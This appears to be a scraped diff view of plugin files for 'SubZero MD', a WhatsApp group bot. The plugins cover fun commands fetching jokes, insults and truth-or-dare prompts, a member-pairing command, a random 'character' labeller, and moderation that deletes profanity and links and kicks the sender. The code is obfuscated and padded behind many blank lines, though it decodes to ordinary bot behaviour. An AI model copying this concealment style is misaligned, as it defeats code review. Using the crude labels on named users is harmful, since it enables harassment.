function _0x50c2(_0x2425c2,_0x529e53){const _0x3f8186=_0x3f81();return _0x50c2=function(_0x50c2df,_0x162bbf){_0x50c2df=_0x50c2df-0xf8;let _0x2063bb=_0x3f8186[_0x50c2df];return _0x2063bb;},_0x50c2(_0x2425c2,_0x529e53);}const _0x3529e0=_0x50c2;function _0x3f81(){const _0x24fffa=['Sigma','Get\x20a\x20random\x20dare\x20question.','data','Hello\x20World!','\x0a\x0a🧠\x20*SubZero\x20Random\x20Fun\x20Fact*\x20🧠\x0a\x0a','join','sender','Get\x20a\x20random\x20insult','Obedient','log','An\x20error\x20occurred\x20while\x20fetching\x20fonts.','Error\x20in\x20character\x20command:','\x20is\x20*','Patient','390dsMKka','reply','\x0a\x0aIsn\x27t\x20that\x20interesting?\x20😄\x0a\x0a','ᴍʀ\x20ғʀᴀɴᴋ\x20ᴏғᴄ','character','*\x20🔥⚡','Error\x20in\x20pickupline\x20command:','Get\x20a\x20random\x20pickup\x20line\x20from\x20the\x20API.','JSON\x20response:','609037KClbPU','darequestion','❌\x20Failed\x20to\x20fetch\x20a\x20truth\x20question.\x20Please\x20try\x20again\x20later.','🧠\x20Get\x20a\x20random\x20fun\x20fact','style','Helpful','dare','fun','https://api.davidcyriltech.my.id/truth','7281cGkTOq','Gorgeous','.truth','json','message','2168sqgrHJ','split','question','Please\x20mention\x20a\x20user\x20whose\x20character\x20you\x20want\x20to\x20check.','Good','⚠️\x20An\x20error\x20occurred\x20while\x20fetching\x20a\x20fun\x20fact.\x20Please\x20try\x20again\x20later.','\x0a\x0a😂\x20*Here\x27s\x20a\x20random\x20joke\x20for\x20you!*\x20😂\x0a\x0a*','Sorry,\x20something\x20went\x20wrong\x20while\x20fetching\x20the\x20pickup\x20line.\x20Please\x20try\x20again\x20later.','name','result','font','../command','truth','Overconfident','*Dare:*\x20','1032EGylay','Brilliant','1608460wUSIEM','Randomly\x20pairs\x20the\x20command\x20user\x20with\x20another\x20group\x20member.','SubZero\x20Bot',':*\x0a','*Truth\x20Question:*\x20','fact','node-fetch','char','participants','Check\x20the\x20character\x20of\x20a\x20mentioned\x20user.','Please\x20provide\x20text\x20to\x20convert\x20into\x20fonts.\x20Eg\x20.fancy\x20Mr\x20Frank','success','insult','Grumpy','error','contextInfo','This\x20command\x20can\x20only\x20be\x20used\x20in\x20groups.','7567nENSQG','axios','Error:\x20','https://evilinsult.com/generate_insult.php?lang=en&type=json','Convert\x20text\x20into\x20various\x20fonts.','⚠️\x20En\x20Error\x20Appears.','*🔥\x20Fetching\x20a\x20dare\x20question...*','pickup','https://www.dark-yasiya-api.site/other/font?text=','pickupline','get','ship','https://api.davidcyriltech.my.id/dare','cup','\x0aCongratulations\x20💖🍻','Unable\x20to\x20retrieve\x20an\x20insult.\x20Please\x20try\x20again\x20later.','417464WsFNPs','.dare','sendMessage','8150kQVfvO','random','20680JTRCEY','120363304325601080@newsletter','18738zxoSmI','Cool','status','mentionedJid','fancy','❌\x20An\x20error\x20occurred\x20while\x20fetching\x20the\x20truth\x20question.','truthquestion','😂\x20Get\x20a\x20random\x20joke','Hot','Character\x20of\x20@','*Insult:*\x20','love','\x20😄\x0a\x0a>\x20*©\x20ᴘᴏᴡᴇʀᴇᴅ\x20ʙʏ\x20Jᴀᴡᴀᴅ\x20TᴇᴄʜX*','❌\x20An\x20error\x20occurred\x20while\x20fetching\x20the\x20dare\x20question.','Generous','*🔍\x20Fetching\x20a\x20truth\x20question...*','Error\x20in\x20ship\x20command:','*SUBZERO\x20FANCY\x20FONTS*:\x0a\x0a'];_0x3f81=function(){return _0x24fffa;};return _0x3f81();}(function(_0x226971,_0x4acd63){const _0x41e173=_0x50c2,_0x2fd219=_0x226971();while(!![]){try{const _0x3dbae9=parseInt(_0x41e173(0x156))/0x1+-parseInt(_0x41e173(0x126))/0x2+parseInt(_0x41e173(0x15f))/0x3*(parseInt(_0x41e173(0x164))/0x4)+parseInt(_0x41e173(0x105))/0x5+-parseInt(_0x41e173(0x14d))/0x6*(parseInt(_0x41e173(0x116))/0x7)+-parseInt(_0x41e173(0x103))/0x8*(-parseInt(_0x41e173(0x12d))/0x9)+parseInt(_0x41e173(0x129))/0xa*(-parseInt(_0x41e173(0x12b))/0xb);if(_0x3dbae9===_0x4acd63)break;else _0x2fd219['push'](_0x2fd219['shift']());}catch(_0x19a293){_0x2fd219['push'](_0x2fd219['shift']());}}}(_0x3f81,0xabc38));function hi(){const _0x383ca6=_0x50c2;console[_0x383ca6(0x148)](_0x383ca6(0x142));}hi();const axios=require(_0x3529e0(0x117)),fetch=require(_0x3529e0(0x10b)),{cmd,commands}=require(_0x3529e0(0xff)),toM=_0x5a33c8=>'@'+_0x5a33c8[_0x3529e0(0x165)]('@')[0x0];cmd({'pattern':_0x3529e0(0x121),'alias':[_0x3529e0(0x123),_0x3529e0(0x138)],'desc':_0x3529e0(0x106),'react':'❤️','category':_0x3529e0(0x15d),'filename':__filename},async(_0x24a493,_0x4690d3,_0x347077,{from:_0x5dbe39,isGroup:_0x1373f2,groupMetadata:_0x47ffe8,reply:_0x4efe86})=>{const _0x454c5b=_0x3529e0;try{if(!_0x1373f2)return _0x4efe86(_0x454c5b(0x115));const _0x354ac7=_0x47ffe8[_0x454c5b(0x10d)]['map'](_0x2bdd8c=>_0x2bdd8c['id']);if(_0x354ac7['length']<0x2)return _0x4efe86('Not\x20enough\x20members\x20to\x20pair.');const _0x33ffdf=_0x347077[_0x454c5b(0x145)];let _0x11ce2a;do{_0x11ce2a=_0x354ac7[Math['floor'](Math[_0x454c5b(0x12a)]()*_0x354ac7['length'])];}while(_0x11ce2a===_0x33ffdf);const _0xf025b1=toM(_0x33ffdf)+'\x20❤️\x20'+toM(_0x11ce2a)+_0x454c5b(0x124);await _0x24a493[_0x454c5b(0x128)](_0x5dbe39,{'text':_0xf025b1,'contextInfo':{'mentionedJid':[_0x33ffdf,_0x11ce2a],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x454c5b(0x12c),'newsletterName':_0x454c5b(0x107),'serverMessageId':0x8f}}});}catch(_0x184458){console['error'](_0x454c5b(0x13d),_0x184458),_0x4efe86('An\x20error\x20occurred\x20while\x20processing\x20the\x20command.\x20Please\x20try\x20again.');}}),cmd({'pattern':_0x3529e0(0x111),'desc':_0x3529e0(0x146),'category':_0x3529e0(0x15d),'react':'🤥'},async(_0x357ddd,_0x209b2e)=>{const _0x4728e5=_0x3529e0;try{let _0x1b8745=await axios['get'](_0x4728e5(0x119)),_0x1feaa5=_0x1b8745[_0x4728e5(0x141)];if(!_0x1feaa5||!_0x1feaa5[_0x4728e5(0x111)])return _0x209b2e[_0x4728e5(0x14e)](_0x4728e5(0x125));let _0x58cac5=_0x1feaa5[_0x4728e5(0x111)];return _0x209b2e[_0x4728e5(0x14e)](_0x4728e5(0x137)+_0x58cac5);}catch(_0x33ffe1){_0x209b2e[_0x4728e5(0x14e)](_0x4728e5(0x118)+(_0x33ffe1[_0x4728e5(0x163)]||_0x33ffe1));}}),cmd({'pattern':'joke','desc':_0x3529e0(0x134),'react':'🤣','category':_0x3529e0(0x15d),'filename':__filename},async(_0x317b52,_0x38f6ac,_0x28306f,{from:_0x32753d,q:_0x5e984a,reply:_0x5160e5})=>{const _0x289248=_0x3529e0;try{const _0x40b22c='https://official-joke-api.appspot.com/random_joke',_0x45dfb8=await axios[_0x289248(0x120)](_0x40b22c),_0x3db1e4=_0x45dfb8[_0x289248(0x141)],_0x2a61f1=_0x289248(0xfa)+_0x3db1e4['setup']+'*\x0a\x0a'+_0x3db1e4['punchline']+_0x289248(0x139);return _0x5160e5(_0x2a61f1);}catch(_0x26d2eb){return console[_0x289248(0x148)](_0x26d2eb),_0x5160e5(_0x289248(0x11b));}}),cmd({'pattern':_0x3529e0(0x10a),'desc':_0x3529e0(0x159),'react':'🧠','category':'fun','filename':__filename},async(_0x134419,_0x4d112e,_0x57e1c2,{from:_0x30aa8d,q:_0x2b6fba,reply:_0x4f98d2})=>{const _0x13bcfd=_0x3529e0;try{const _0x3c19f8='https://uselessfacts.jsph.pl/random.json?language=en',_0x2816ea=await axios[_0x13bcfd(0x120)](_0x3c19f8),_0x43241b=_0x2816ea[_0x13bcfd(0x141)]['text'],_0x21bf87=_0x13bcfd(0x143)+_0x43241b+_0x13bcfd(0x14f);return _0x4f98d2(_0x21bf87);}catch(_0x232707){return console[_0x13bcfd(0x148)](_0x232707),_0x4f98d2(_0x13bcfd(0xf9));}}),cmd({'pattern':_0x3529e0(0x131),'alias':[_0x3529e0(0xfe),_0x3529e0(0x15a)],'react':'✍️','desc':_0x3529e0(0x11a),'category':'tools','filename':__filename},async(_0x3bc416,_0x156957,_0x323e96,{from:_0x15025f,quoted:_0x136e18,body:_0xc4e90a,args:_0x3635bd,q:_0x551408,reply:_0x5f5a38})=>{const _0x156cc3=_0x3529e0;try{if(!_0x551408)return _0x5f5a38(_0x156cc3(0x10f));let _0x4af885=await axios['get'](_0x156cc3(0x11e)+encodeURIComponent(_0x551408)),_0x5cf408=_0x4af885[_0x156cc3(0x141)];if(!_0x5cf408[_0x156cc3(0x12f)])return _0x5f5a38('Error\x20fetching\x20fonts.\x20Please\x20try\x20again\x20later.');let _0xaed5d0=_0x5cf408[_0x156cc3(0xfd)]['map'](_0x596b4a=>'*'+_0x596b4a[_0x156cc3(0xfc)]+_0x156cc3(0x108)+_0x596b4a[_0x156cc3(0xfd)])[_0x156cc3(0x144)]('\x0a\x0a'),_0x2fc699=_0x156cc3(0x13e)+_0xaed5d0+'\x0a\x0a>\x20*©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ*';await _0x3bc416['sendMessage'](_0x15025f,{'text':_0x2fc699,'contextInfo':{'mentionedJid':[_0x323e96['sender']],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':'120363304325601080@newsletter','newsletterName':_0x156cc3(0x150),'serverMessageId':0x8f}}},{'quoted':_0x156957});}catch(_0x35a8a2){console[_0x156cc3(0x113)](_0x35a8a2),_0x5f5a38(_0x156cc3(0x149));}}),cmd({'pattern':_0x3529e0(0x11f),'alias':[_0x3529e0(0x11d)],'desc':_0x3529e0(0x154),'react':'💬','category':'fun','filename':__filename},async(_0x6f502e,_0x24fcc9,_0x15ff3b,{from:_0x3c53cb,reply:_0x1e4fcd})=>{const _0x2c17f0=_0x3529e0;try{const _0x135d3d=await fetch('https://api.popcat.xyz/pickuplines');if(!_0x135d3d['ok'])throw new Error('API\x20request\x20failed\x20with\x20status\x20'+_0x135d3d['status']);const _0x66ddb5=await _0x135d3d[_0x2c17f0(0x162)]();console[_0x2c17f0(0x148)](_0x2c17f0(0x155),_0x66ddb5);const _0xc2ae7f='*Here\x27s\x20a\x20pickup\x20line\x20for\x20you:*\x0a\x0a\x22'+_0x66ddb5['pickupline']+'\x22\x0a\x0a>\x20*©\x20Dropped\x20By\x20Mr\x20Frank\x20OFC*';await _0x6f502e[_0x2c17f0(0x128)](_0x3c53cb,{'text':_0xc2ae7f},{'quoted':_0x15ff3b});}catch(_0x38c82f){console[_0x2c17f0(0x113)](_0x2c17f0(0x153),_0x38c82f),_0x1e4fcd(_0x2c17f0(0xfb));}}),cmd({'pattern':_0x3529e0(0x151),'alias':[_0x3529e0(0x10c)],'desc':_0x3529e0(0x10e),'react':'🔥','category':_0x3529e0(0x15d),'filename':__filename},async(_0x30d806,_0xefdbee,_0x522086,{from:_0x207a11,isGroup:_0x39b8a3,text:_0x26c657,reply:_0xb9d8b8})=>{const _0x1899e8=_0x3529e0;try{if(!_0x39b8a3)return _0xb9d8b8(_0x1899e8(0x115));const _0x161736=_0x522086[_0x1899e8(0x163)]['extendedTextMessage']?.[_0x1899e8(0x114)]?.[_0x1899e8(0x130)]?.[0x0];if(!_0x161736)return _0xb9d8b8(_0x1899e8(0x167));const _0x173f7e=[_0x1899e8(0x13f),_0x1899e8(0x13b),_0x1899e8(0x112),_0x1899e8(0x101),_0x1899e8(0x147),_0x1899e8(0xf8),'Simp','Kind',_0x1899e8(0x14c),'Pervert',_0x1899e8(0x12e),_0x1899e8(0x15b),_0x1899e8(0x104),'Sexy',_0x1899e8(0x135),_0x1899e8(0x160),'Cute'],_0xb61e2d=_0x173f7e[Math['floor'](Math[_0x1899e8(0x12a)]()*_0x173f7e['length'])],_0x51ba9f=_0x1899e8(0x136)+_0x161736[_0x1899e8(0x165)]('@')[0x0]+_0x1899e8(0x14b)+_0xb61e2d+_0x1899e8(0x152);await _0x30d806[_0x1899e8(0x128)](_0x207a11,{'text':_0x51ba9f,'mentions':[_0x161736]},{'quoted':_0x522086});}catch(_0x1da910){console[_0x1899e8(0x113)](_0x1899e8(0x14a),_0x1da910),_0xb9d8b8('An\x20error\x20occurred\x20while\x20processing\x20the\x20command.\x20Please\x20try\x20again.');}}),cmd({'pattern':_0x3529e0(0x100),'alias':['t',_0x3529e0(0x133)],'react':'❔','desc':'Get\x20a\x20random\x20truth\x20question.','category':_0x3529e0(0x15d),'use':_0x3529e0(0x161),'filename':__filename},async(_0x455177,_0x536aa8,_0x737db3,{from:_0x4295da,args:_0x41a582,reply:_0x316147})=>{const _0x36ea92=_0x3529e0;try{_0x316147(_0x36ea92(0x13c));const _0x1d4d20=_0x36ea92(0x15e),_0x582d89=await axios[_0x36ea92(0x120)](_0x1d4d20);if(!_0x582d89[_0x36ea92(0x141)]||!_0x582d89[_0x36ea92(0x141)][_0x36ea92(0x110)])return _0x316147(_0x36ea92(0x158));const _0x31dfa3=_0x582d89[_0x36ea92(0x141)][_0x36ea92(0x166)];_0x31dfa3&&_0x316147(_0x36ea92(0x109)+_0x31dfa3);}catch(_0x4f56dd){console['error'](_0x4f56dd),_0x316147(_0x36ea92(0x132));}}),cmd({'pattern':_0x3529e0(0x15c),'alias':['d',_0x3529e0(0x157)],'react':'🔥','desc':_0x3529e0(0x140),'category':'fun','use':_0x3529e0(0x127),'filename':__filename},async(_0x208d71,_0xfd2c1e,_0xb724c4,{from:_0x3ded8b,args:_0x1b8ece,reply:_0x4cdc3e})=>{const _0x2709b7=_0x3529e0;try{_0x4cdc3e(_0x2709b7(0x11c));const _0x5ae98f=_0x2709b7(0x122),_0x3ca5e7=await axios['get'](_0x5ae98f);if(!_0x3ca5e7[_0x2709b7(0x141)]||!_0x3ca5e7[_0x2709b7(0x141)][_0x2709b7(0x110)])return _0x4cdc3e('❌\x20Failed\x20to\x20fetch\x20a\x20dare\x20question.\x20Please\x20try\x20again\x20later.');const _0x3a8d5a=_0x3ca5e7[_0x2709b7(0x141)][_0x2709b7(0x166)];_0x3a8d5a&&_0x4cdc3e(_0x2709b7(0x102)+_0x3a8d5a);}catch(_0x2d8cb9){console['error'](_0x2d8cb9),_0x4cdc3e(_0x2709b7(0x13a));}});
|
plugins/gc-antitools.js
ADDED
@@ -0,0 +1,220 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
function _0x41a2(_0x3363fd,_0x3b6c08){const _0x2789e2=_0x2789();return _0x41a2=function(_0x41a2c8,_0x341585){_0x41a2c8=_0x41a2c8-0xd0;let _0x7093d1=_0x2789e2[_0x41a2c8];return _0x7093d1;},_0x41a2(_0x3363fd,_0x3b6c08);}const _0x2626da=_0x41a2;(function(_0x484360,_0xeaa57){const _0x195567=_0x41a2,_0x456fc0=_0x484360();while(!![]){try{const _0x29e2b2=-parseInt(_0x195567(0xf1))/0x1*(parseInt(_0x195567(0xdd))/0x2)+-parseInt(_0x195567(0xf3))/0x3+parseInt(_0x195567(0xd0))/0x4*(parseInt(_0x195567(0xd3))/0x5)+-parseInt(_0x195567(0xea))/0x6*(-parseInt(_0x195567(0xd1))/0x7)+parseInt(_0x195567(0xd5))/0x8*(-parseInt(_0x195567(0xec))/0x9)+-parseInt(_0x195567(0xdf))/0xa+-parseInt(_0x195567(0xda))/0xb*(-parseInt(_0x195567(0xe7))/0xc);if(_0x29e2b2===_0xeaa57)break;else _0x456fc0['push'](_0x456fc0['shift']());}catch(_0x4fea7f){_0x456fc0['push'](_0x456fc0['shift']());}}}(_0x2789,0xcb99f));function hi(){const _0x2a8fc6=_0x41a2;console[_0x2a8fc6(0xe9)]('Hello\x20World!');}hi();const {cmd}=require(_0x2626da(0xe3)),config=require(_0x2626da(0xd8));function _0x2789(){const _0x298afd=['ANTI_BAD_WORD','11760eElaxd','body','4416657uxNgqr','52KNLEfj','40159VjOyqY','ANTI_LINK','112415YlusgV','some','3391064HYLSae','sendMessage','mia','../config','includes','10485211vDihAL','ponnaya','hutto','200DiPnJl','xxx','15882430WWckSr','true','test','key','../command','split','pussy','sex','60Rveplp','An\x20error\x20occurred\x20while\x20processing\x20the\x20message.','log','456xeflfk','\x20has\x20been\x20removed.\x20🚫','9ABPNOq','wtf','🚫\x20⚠️BAD\x20WORDS\x20NOT\x20ALLOWED⚠️\x20🚫','remove'];_0x2789=function(){return _0x298afd;};return _0x2789();}cmd({'on':_0x2626da(0xf2)},async(_0x29e7b2,_0x428e2c,_0x40de91,{from:_0x1b42b1,body:_0x1b8105,isGroup:_0x301dc1,isAdmins:_0x245384,isBotAdmins:_0x2b918d,reply:_0x148341,sender:_0x3c7447})=>{const _0x1133da=_0x2626da;try{const _0x42c924=[_0x1133da(0xed),_0x1133da(0xd7),_0x1133da(0xde),'fuck',_0x1133da(0xe6),'ass',_0x1133da(0xe5),_0x1133da(0xdb),_0x1133da(0xdc)];if(!_0x301dc1||_0x245384||!_0x2b918d)return;const _0x87044=_0x1b8105['toLowerCase'](),_0x277ec4=_0x42c924[_0x1133da(0xd4)](_0xf52b9e=>_0x87044[_0x1133da(0xd9)](_0xf52b9e));_0x277ec4&config[_0x1133da(0xf0)]===_0x1133da(0xe0)&&(await _0x29e7b2[_0x1133da(0xd6)](_0x1b42b1,{'delete':_0x428e2c[_0x1133da(0xe2)]},{'quoted':_0x428e2c}),await _0x29e7b2[_0x1133da(0xd6)](_0x1b42b1,{'text':_0x1133da(0xee)},{'quoted':_0x428e2c}));}catch(_0x2ea503){console['error'](_0x2ea503),_0x148341(_0x1133da(0xe8));}});const linkPatterns=[/https?:\/\/(?:chat\.whatsapp\.com|wa\.me)\/\S+/gi,/^https?:\/\/(www\.)?whatsapp\.com\/channel\/([a-zA-Z0-9_-]+)$/,/wa\.me\/\S+/gi,/https?:\/\/(?:t\.me|telegram\.me)\/\S+/gi,/https?:\/\/(?:www\.)?youtube\.com\/\S+/gi,/https?:\/\/youtu\.be\/\S+/gi,/https?:\/\/(?:www\.)?facebook\.com\/\S+/gi,/https?:\/\/fb\.me\/\S+/gi,/https?:\/\/(?:www\.)?instagram\.com\/\S+/gi,/https?:\/\/(?:www\.)?twitter\.com\/\S+/gi,/https?:\/\/(?:www\.)?tiktok\.com\/\S+/gi,/https?:\/\/(?:www\.)?linkedin\.com\/\S+/gi,/https?:\/\/(?:www\.)?snapchat\.com\/\S+/gi,/https?:\/\/(?:www\.)?pinterest\.com\/\S+/gi,/https?:\/\/(?:www\.)?reddit\.com\/\S+/gi,/https?:\/\/ngl\/\S+/gi,/https?:\/\/(?:www\.)?discord\.com\/\S+/gi,/https?:\/\/(?:www\.)?twitch\.tv\/\S+/gi,/https?:\/\/(?:www\.)?vimeo\.com\/\S+/gi,/https?:\/\/(?:www\.)?dailymotion\.com\/\S+/gi,/https?:\/\/(?:www\.)?medium\.com\/\S+/gi];cmd({'on':'body'},async(_0x3db47a,_0x572cfa,_0x5b8702,{from:_0x33e8f0,body:_0x2ed5e1,sender:_0x4c2bcf,isGroup:_0x4f06c4,isAdmins:_0x212aa8,isBotAdmins:_0x195837,reply:_0x218c22})=>{const _0x369f52=_0x2626da;try{if(!_0x4f06c4||_0x212aa8||!_0x195837)return;const _0x2adf2b=linkPatterns[_0x369f52(0xd4)](_0x2fe573=>_0x2fe573[_0x369f52(0xe1)](_0x2ed5e1));_0x2adf2b&&config[_0x369f52(0xd2)]===_0x369f52(0xe0)&&(await _0x3db47a[_0x369f52(0xd6)](_0x33e8f0,{'delete':_0x572cfa['key']},{'quoted':_0x572cfa}),await _0x3db47a[_0x369f52(0xd6)](_0x33e8f0,{'text':'⚠️\x20Links\x20are\x20not\x20allowed\x20in\x20this\x20group.\x0a@'+_0x4c2bcf[_0x369f52(0xe4)]('@')[0x0]+_0x369f52(0xeb),'mentions':[_0x4c2bcf]},{'quoted':_0x572cfa}),await _0x3db47a['groupParticipantsUpdate'](_0x33e8f0,[_0x4c2bcf],_0x369f52(0xef)));}catch(_0x41254d){console['error'](_0x41254d),_0x218c22(_0x369f52(0xe8));}});
|
plugins/gc-delete.js
ADDED
@@ -0,0 +1,249 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
/*
|
3 |
+
|
4 |
+
$$$$$$\ $$\
|
5 |
+
$$ __$$\ $$ |
|
6 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
7 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
8 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
9 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
10 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
11 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
12 |
+
|
13 |
+
Project Name : SubZero MD
|
14 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
15 |
+
